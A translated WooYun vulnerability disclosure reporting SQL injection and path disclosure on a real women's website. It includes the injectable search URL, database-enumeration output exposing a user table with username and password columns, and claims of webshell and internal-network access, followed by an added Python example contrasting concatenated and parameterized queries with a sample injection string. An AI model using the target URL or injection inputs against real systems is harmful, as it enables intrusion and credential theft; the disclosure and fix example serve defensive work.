
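Vulnerability summary

Bug ID: wooyun-2012-011041

Title: High-risk SQL injection and path disclosure on the main site of 悦已女性网 (leading to penetration of the internal network)

Vendor: 悦已女性网

Author: 小蝎

Submitted: 2012-08-19 11:35

Fixed: 2012-10-03 11:36

Disclosed: 2012-10-03 11:36

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]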


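Vulnerability details

Disclosure status:

2012-08-19: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2012-10-03: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

The high-risk SQL injection on the main site of 悦已女性网 can be used to upload a webshell, escalate privileges and take over the server... the next step leads into the internal network...

Detailed description:

1. Parameters are not filtered thoroughly, which leads to SQLi;
2. Some sensitive local paths are disclosed to third-party intruders;

Proof of vulnerability: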

http://www.self.com.cn:80/search?word=%E6%9D%88%E6%92%B3%E5%8F%86%E9%8F%82%E5%9B%A9%E7%8F%B7%E9%8D%8F%E6%8A%BD%E6%95%AD%E7%92%87


available databases [3]:
[*] information_schema
[*] selfcms
[*] test
Database: selfcms
[53 tables]
Database: selfcms
Table: sys_user
[5 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| logtime | int(10) |
| pwd | varchar(255) |
| rid | int(10) |
| uid | int(10) |
| uname | varchar(255) |
+---------+--------------+
Database: selfcms
Table: sys_user
[58 entries]

Fix:

Filter the input.
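
An added example, not part of the original report and not the site's code: a search handler for a `word` parameter shown first with string concatenation and then with a bound parameter and generic error responses, covering both points of the detailed description. The `articles` table, the function names and the sample rows are constructed, and SQLite stands in for the site's database.

```python
import logging
import sqlite3

def make_db():
    # Constructed sample data; the real site's schema is not reproduced here.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO articles (title) VALUES ('spring skincare'), ('100% cotton guide');
    """)
    return db

def search_vulnerable(db, word):
    # Before: the request parameter is concatenated into the statement text,
    # so a quote in `word` changes the structure of the query.
    sql = "SELECT title FROM articles WHERE title LIKE '%" + word + "%'"
    return [row[0] for row in db.execute(sql)]

def search_safe(db, word):
    # After: the value is bound as a parameter and never parsed as SQL.
    # LIKE wildcards typed by the user are escaped so they match literally.
    esc = word.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT title FROM articles WHERE title LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, ("%" + esc + "%",))]

def handle_search(db, word, search=search_safe):
    # Database errors are logged server-side only; the response carries no
    # SQL text, stack trace or local file path.
    try:
        return 200, search(db, word)
    except sqlite3.Error:
        logging.exception("search query failed")
        return 500, "internal error"

if __name__ == "__main__":
    db = make_db()
    probe = "zzz' OR 1=1 --"  # constructed input containing a quote
    print(search_vulnerable(db, probe))  # every row comes back
    print(search_safe(db, probe))        # no row matches the literal text
    print(handle_search(db, "it's", search_vulnerable))
```

Binding the value removes the injection regardless of what characters the input contains, which a character blacklist cannot guarantee.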

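Copyright notice: when reposting, credit the source 小蝎@乌云 (WooYun)


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined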